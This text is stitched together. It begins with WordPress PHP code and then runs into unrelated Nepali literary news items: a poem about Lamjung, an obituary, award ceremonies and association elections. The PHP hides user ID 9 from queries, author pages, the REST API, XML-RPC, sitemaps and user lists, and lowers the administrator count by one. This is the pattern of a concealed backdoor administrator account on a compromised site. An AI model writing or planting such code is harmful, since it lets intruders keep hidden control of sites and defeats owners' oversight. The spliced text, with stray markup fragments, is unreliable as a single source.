add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 9;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 9 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 9;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 9;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
वन जंगलले जडीबुटी प्रशोधन खोजेको छ ।
नदीका बाहाबमा हाइड्रो प्रशस्तै छन्
लमजुङे सहुलियत बिजुली खोजेको छ ।
रित्तिएका लेकका खर्कमा, गोठलाहरू
चौरी र भेडीगोठ भित्र जीवन खोजेको छ ।
मलिलो तरेली फाँट अझै बाँझै छन्
पाखुरी र सिँचाइको सहारा खोजेको छ ।
उर्लँदै गरेका खहरे खोलाले त्रास बढाउँदा,
कटान रोक्न बलियो तटबन्धन खोजेको छ ।
बुढा बा– आमाको जीवन धान्ने सहारा
आफ्नै गाउँघरमै भत्ता खोजेको छ ।
निम्सरो बिरामी पीडामा भौंतारिनु नपरोस्,
औषधि र अस्पताल खोजेको छ ।
बा–आमाको काखमै भविष्य बनाऊन
विद्यार्थीले गुणस्तरीय शिक्षा खोजेको छ ।
रमणीय हिमाल, पहाड र लेकका दृश्यले,
आफ्नै पहिचान भित्र पर्यटक खोजेको छ ।
फरक चाहना बोकेका युवाहरूका,
आत्मनिर्भरता र रोजगारी खोजेको छ ।
कोरिएका थुप्रै धुले बाटाहरू
स्तरोन्नति र कालोपत्रे खोजेको छ ।
लोपोन्मुख मौलिक अमूर्त सम्पदा धेरै छन्
जसले खोज, संरक्षण र प्रवर्द्धन खोजेको छ ।
अझै कतै लुकेका विभेद बाँकी नै छन्,
समानता र सामाजिक न्याय खोजेको छ ।
यिनै सबै चाहना पूरा गर्ने आशा बोकेर,
लमजुङवासीले धर्मराज केसी रोजेको छ ।
केही समयअगि क्यान्सरका कारण थलिएका उपाध्याय शल्यक्रियापछि स्वास्थ्य लाभ गरी फेदीखोला-२, चनौटे, स्याङ्जामा बस्दै आएका थिए । हाल सामान्य स्वास्थ्य अवस्था भएका उनी शुक्रवार बिहान घरायसी नियमित काम सकेपछि एक्कासि ढल्न पुगेका थिए । उनलाई पोखरास्थित गण्डकी मेडिकल कलेजमा ल्याइए पनि चिकित्सकले हृदयघातका कारण निधन भएको जानकारी दिएका थिए ।
२००८ साल मङ्सिर १६ गते जन्मेका उपाध्याय ४० वर्षसम्म विभिन्न विद्यालयमा अध्यापन गरी निवृत्त भएका शिक्षक हुन् । उपाध्यायका जेठा छोरा सुरज साहित्यिक क्षेत्रमा क्रियाशील छन् । विशेष गरी बालसाहित्यमा क्रियाशील सुरजका ‘चिल उड्यो आकाशमा’, ‘साइकल’ र ‘बाबा कतारमा आमा हतारमा’ गरी ३ बालकविता सङ्ग्रह तथा ‘तिम्रो मन फर्किएन’ नामक गजल सङ्ग्रह प्रकाशित छन् । उनी प्रगतिशील लेखक सङ्घ, गण्डकी प्रदेशका सचिवालय सदस्य तथा गीतकार प्रतिष्ठानका सदस्य हुन् । स्व. उपाध्यायका सुरजसहित सन्तोष र रेशम गरी ३ छोरा, १ छोरी र श्रीमती छन् ।
]]>उक्त कार्यक्रममा स्रष्टाद्वय मीना चौलागाईं र पवन आलोकलाई क्रमशः २०८१ र २०८२ सालको ‘जगदीश घिमिरे स्मृति पुरस्कार’ले सम्मानित गरिएको आयोजकको भनाइ छ । 
मन्थली नगरपालिकाकी उपमेयर ईश्वरी बस्नेतले स्रष्टाद्वयलाई क्रमशः ५१ हजार नगदराशिको चेक र ‘जगदीश घिमिरे प्रतिष्ठान’की अध्यक्ष एवम् जगदीश घिमिरेकी धर्मपत्नी श्रीमती दुर्गा घिमिरेले सम्मानपत्र अर्पण गर्नुभएको थियो । सो क्रममा प्रमुख अतिथि बस्नेतले नगरपालिकाले साहित्य, कला, संस्कृतिको खोज, संरक्षण र प्रवद्र्धनका क्षेत्रमा ध्यानाकर्षण भएको बताउनु भयो । उपमेयर बस्नेतले जगदीश घिमिरेको सम्मानमा सङ्ग्रहालय बताउने कार्यमा नगरपालिकाको धारणा सकारात्मक रहेको बताउँदै यसमा नगरपालिकाले विभिन्न निकायहरूसँग समन्वय गरेर अगाडि बढ्ने बताउनुभयो ।
साहित्यकार श्रीओम श्रेष्ठ रोदनले पुरस्कृत स्रष्टाद्वयको व्यक्तित्व परिचय दिनुभएको थियो । उक्त कार्यक्रममा जगदीश घिमिरे प्रतिष्ठानका सल्लाहकारहरू क्रमशः नगेन्द्रराज शर्मा, रोचक घिमिरे र ज्ञानु पाण्डेले पनि मन्तव्य राख्नुभएको थियो । 
डा.सुमन कर्माचार्यको उद्घोषणमा सञ्चालित उक्त समारोहमा उहाँद्वारा लिखित ‘जगदीश घिमिरेको संक्षिप्त जीवनी’ पनि लोकार्पण गरिएको थियो ।
कार्यक्रममा शुभकामना मन्तव्य राख्ने क्रममा केही वक्ताहरूले हाल सरकारी स्वामित्वमा रहेका साहित्यकार जगदीश घिमिरे जन्मनु भएको मन्थलीस्थित घरलाई जगदीश घिमिरेको सम्मानमा सङ्ग्रहालयको रूपमा विकसित गरिनुपर्ने धारणा राखेका थिए । 
तामाकोशी सेवा समिति, मन्थलीका अध्यक्ष गुञ्जबहादुर श्रेष्ठले स्वागत मन्तव्य राख्दै शुरू भएको उक्त कार्यक्रममा साहित्यकार माधव शयपत्रीले जगदीश घिमिरेको व्यक्तित्वमाथि प्रकाश पार्नु भएको थियो । उहाँले समाजमा पछि पारिएका भुइँमान्छेहरूको पक्षमा सशक्त रूपमा कलम चलाउने घिमिरेको यसरी स्मृति दिवस मनाउनु सकारात्मक भएको बताउँदै रामेछापमा जन्म लिएर राष्ट्रियस्तरमा योगदान पु¥याएका अन्य विभिन्न दिवंगत स्रष्टाहरूलाई पनि रामेछाप जिल्लाले यसैगरी स्मरण गरेर सम्मान गर्नुपर्ने धारणा राख्नुभएको थियो ।
उक्त समारोहमा ज्ञानु पाण्डे, हिरालाल आचार्य (अनार बाजे), गङ्गा चापागाईं, गौरव बोहोरा, डा.उमेश घिमिरे, बद्री नयाँघरे, देविकानन्द तिमल्सिना, मधु पाठक, प्रेम घिमिरे, राजेश उपाध्याय, सुषमा आचार्य अंशु, कुमार दाहाल, वसन्त रिजाल, नगेन्द्रराज शर्मा, रोचक घिमिरे, प्रतीक घिमिरे, डा. सुमन कर्माचार्य लगायतका कविहरूले आआफ्ना रचना वाचन गर्नु भएको थियो ।
उक्त अवसरमा ‘साहित्यिक र सामाजिक योगदानमा जगदीश घिमिरेको उपस्थिति’ शीर्षक वक्तृत्व प्रतियोगिता गर्नुका साथै विजयी विद्यार्थीहरूलाई पुरस्कृत गर्ने कार्य गरिएको थियो ।
अन्तरमनको कथाका लेखक जगदीश घिमिरे २०६४ सालको मदन पुरस्कार विजेत हुनुहुन्थ्यो । २००२ चैत २८ गते रामेछापको मन्थलीमा जन्मनु भएका उहाँ ‘माइलोमा’ नामक रक्त क्यान्सरका कारण ६८ वर्षको उमेरमा २०६७ कार्तिक १४ गते निधन भएको थियो ।
]]>
प्रतियोगितामा निर्णायक मण्डलमा पुष्प राज अधिकारी ’ धर्मराज तिमल्सेना शिक्षक राम बहादुर श्रेष्ठ रहनु भएको थियो । प्राविधि क तर्फ शिक्षक– दिपक घर्ती ले हेर्नु भयो । सो अवसरमा साहित्यकार शान्ता अधिकारी घिमिरेलाई आयोजक तथा संयोजक विद्यालयको तर्फबाट सम्मान गरिएको थियो । यसैगरी, स्थानीय समाजसेवी स्व. खोजराज खनालकी सुपुत्री सकुन्तला खनालले आफ्ना पिताको सम्झनामा नौ हजार रूपैंया संस्थालाई प्रदान गर्नुभएको थियो । गजल वाचन तर्फ सर्वोदय मावि आयुषा केसी कक्षा नौ पहिलो, संस्कृति सदन मावि सुजिना भुजेल कक्षा १० दोस्रो तथा पाणिनी संस्कृत मावि उब्जन भट्ट कक्षा ८ तेस्रो र सरस्वती सदन मावि रन्जिता विक कक्षा १० ले सान्त्वना स्थान प्राप्त गरेको निर्णायक रामकुमार श्रेष्ठजले बताउनु भयो । यसैगरी,कार्यसमितिको उपाध्यक्षमा क्रमशः रमेश उप्रेती, रेजिना उप्रेती र युवराज चौलागाईँ निर्वाचित भएका छन् भने शंकर पाण्डे र राजिन पनेरू महासचिव र सचिव पदमा निर्वाचित भएका छन् । यसैगरी कोषाध्यक्षमा रत्न श्रेष्ठ एवम् सदस्यमा क्रमशः खुमन अधिकारी, एलिना चौहान, पूर्णबहादुर लामा, दिनेश काफ्ले, प्रियङ्का प्रसाईँ, गौतम मानन्धर, सहारा पाण्डे, दीपा रेग्मी पन्त, ऋतु कँडेल र शिवम अधिकारी निर्विरोध निर्वाचित भएका छन् । यसैगरी ग्लोबल सञ्चार प्रतिनिधिका रूपमा सञ्चारकर्मी विष्णु शर्मा चयन भएका छन् ।
निवर्तमान अध्यक्ष एवम् हाल एसिया संयोजकका रूपमा रहेका दयाराम पाण्डेयको अध्यक्षतामा सम्पन्न कार्यक्रमको प्रमुख आतिथ्यता इनास ग्लोबल अध्यक्ष अर्जुनप्रसाद काफ्लेले गरेका थिए । काफ्लेले इनासले विश्वभर छरिएर रहेका नेपालीहरूका कला, साहित्य, संस्कृति, भाषा, खेलकुद जस्ता बहुविध विधालाई समेट्दै सोको प्रबर्धनमा विशेष भूमिका निर्वाह गर्ने र आफ्नो कार्यकालले त्यसका लागि आवश्यक पहल गर्ने जानकारी दिए । काफ्लेले इनासले एनआरएनका दोस्रो-तेस्रो पुस्तालाई नेपाली भाषा सिकाउने गरी नेपाली पाठशालाको स्थापना गर्दै कार्य अगाडि बढाएको समेत जानकारी दिए । यसैगरी सन् २०२५-२०२७ कार्यकालका लागि अध्यक्ष पदमा निर्वाचित लामिछानेले आफू र आफ्नो कार्यसमितिले इनासको विधानको मर्मअनुसार कर्म गर्दै विश्वभर रहेका नेपाली कलाकारको भावनालाई कदर गर्ने गरी आगामी कार्ययोजना तय गर्ने प्रतिबद्धता व्यक्त गरे ।
इनास नेपाल शाखाको वर्तमान कार्यसमितिभित्र चलचित्र, गीत-सङ्गीत, भाषासाहित्य, खेलकुद, कलाकारिता, पत्रकारितालगायत बहुविध विधाका विशेषज्ञहरूको प्रतिनिधित्व रहेको र यसलाई आवश्कताअनुसार थप परिष्कृत एवम् परिमार्जित गर्दै लैजान आफूहरू प्रतिबद्ध रहेको जानकारी एसिया संयोजक एवम् नेपाल शाखाका संस्थापक दयाराम पाण्डेयले दिए । कार्यक्रममा इनासका संरक्षक नीता श्रेष्ठ, ग्लोबल कोषाध्यक्ष रूपा न्यौपानेलगायतले शुभकामना मन्तव्य दिएका थिए ।
इनास विश्वभर छरिएका नेपाली कलाकारको हकहितका पक्षमा काम गर्ने र संसारभरि नेपाली संस्कृति, भाषा, साहित्य, कलाकारिता आदिलाई पुर्याउने गरी सन् २०१२ मा पोल्याण्डमा स्थापना भएको सामाजिक संस्था हो । यसको हालसम्म झण्डै ७३ देशमा आफ्नो शाखा स्थापना भइसकेको छ ।
]]>कार्यक्रमका अध्यक्ष तथा वरिष्ठ साहित्यकार काजी रोशन स्व. रणबहादुर खड्का र स्व. शक्तिबहादुर खड्काको तस्बिरमा माल्यार्पण गर्नुभएको थियो । रोशनले नेपाली साहित्य क्षेत्र विशेष गरी कविता विधामा कवि सरस्वती श्रेष्ठ ‘सरू’ को योगदान उल्लेखनीय रहेको भन्दै उहाँको साहित्यिक सिर्जना र प्रतिभाको उच्च मूल्याङ्कन गर्दै उहाँलाई पुरस्कृत गरिएको बताउनुभयो ।
मध्यनेपाल न. पा. ३, सोतीपसल, लमजुङमा जन्मिएर चालिसको दशकदेखि पोखराबाट नेपाली साहित्यमा निरन्तर लागिरहनुभएकी सरूका ‘थुँगा थुँगा जिन्दगानी’ (गीत सङ्ग्रह), ‘एक झुल्को घाम ओर्लेर सडकमा’ ( कविता सङ्ग्रह), ‘फूलहरुको आँधी’ (कविता सङ्ग्रह), ‘किट्टी’ (बालकथा सङ्ग्रह) प्रकाशित छन् ।
त्यसै गरी कवि सरस्वती श्रेष्ठ ‘सरू’ ले नवकविता प्रतिभा पुरस्कार (२०५३), समता सम्मान, इलाम ( २०५४), गजल प्रतिभा सम्मान (२०६३), धादिङ साहित्य समाज सम्मान (२०६४), नवनीत साहित्य सम्मान (२०६५), जनकल्याण स्रष्टा सम्मान (२०६६), समता काव्य सम्मान (२०६६), बाबा साहित्य साधक पुरस्कार (२०६८), विश्व नारी नेपाली साहित्य सम्मान (२०७१), हाम्रो मझेरी साहित्य प्रतिभा सम्मान (२०७१), जननी अवार्ड (२०७२), श्रष्टा साहित्य चौतारी पुरस्कार (२०७२), समता काव्य सन्ध्या रजत वर्ष सम्मान (२०७४), सुभद्रा अधिकारी प्रतिष्ठान पुरस्कार (२०७६), नारी प्रतिभा वाङ्मय प्रतिष्ठान सम्मान (२०७७), साहित्य शृङ्खला सम्मान (२०७७), राष्ट्रिय सङ्गीतकर्मी सङ्घ सम्मान (२०७७), सप्तरङ्गी साहित्य सम्मान (पोखरा २०७७), झलक(पुष्पा सृजना पुरस्कार (२०७९), नइ रजत महोत्सव पदक (२०७९), नइ कृति रत्न (२०८०), अभिलेख सम्मान (२०८१), गीतकार प्रतिष्ठान सम्मान (२०८१) यसअघि प्राप्त गरिसक्नु भएको छ ।
कार्यक्रममा कमल बोहोरा, सीता नेपाली र नवीन शर्माले शुभकामना मन्तव्य दिनुभएको थियो भने कार्यक्रम सञ्चालन नवराज गौतमले गर्नुभएको थियो ।
]]>



उनको प्रथम स्मृति दिवसको अवसरमा रूपा- ५ देउरालीमा शालिक शिलान्यास गरिएको प्रकट पगेनी ‘शिव’ स्मृति प्रतिष्ठानका अध्यक्ष टिकाराम पगेनीले जानकारी दिए । शनिवार रूपा गाउँपालिका अध्यक्ष नवराज ओझाले शालिकको शिलान्यास गरेका थिए । समग्र रूपा तथा देशकै गहनाका रूपमा रहेका साहित्यकार पगेनीको सम्मानमा शालिक निर्माण गर्न लागिएको हो । त्यस्तै रूपा वाङ्मय प्रतिष्ठानले पनि प्रकट पगेनी ‘शिव’को स्मृति दिवसकै अवसरमा उनको सम्झनामा प्रकट पगेनी ‘शिव’ स्मृति पुरस्कार प्रदान गर्ने गरी प्रकट पगेनी ‘शिव’ स्मृति अक्षयकोष स्थापना गर्ने घोषणा गरेको छ भने अक्षयकोष स्थापनामा सहयोग गर्न सबैलाई आह्वान गरेको अध्यक्ष आदर्श पोखरेलले जानकारी दिए ।
२०१३ असोज २४ गते रूपा-५, देउरालीमा जन्मेका प्रकट पगेनी ‘शिव’ को २०८१ वैशाख ४ गते निधन भएको थियो । तगारो छेउ आएर पनि…, किन राख्यो चोखो मुटु… लगायत लोकप्रिय गीतकार गीतकार पगेनीका ‘यो मन कतै अल्झेको छ’ र ‘जूनको चिठी जुनालाई’ गीत सङ्ग्रह, ‘प्रणयवेदका ऋचाहरू’ गजल सङ्ग्रह र ‘अक्षरभरि अक्षता’ कविता सङ्ग्रह प्रकाशित छन् ।
]]>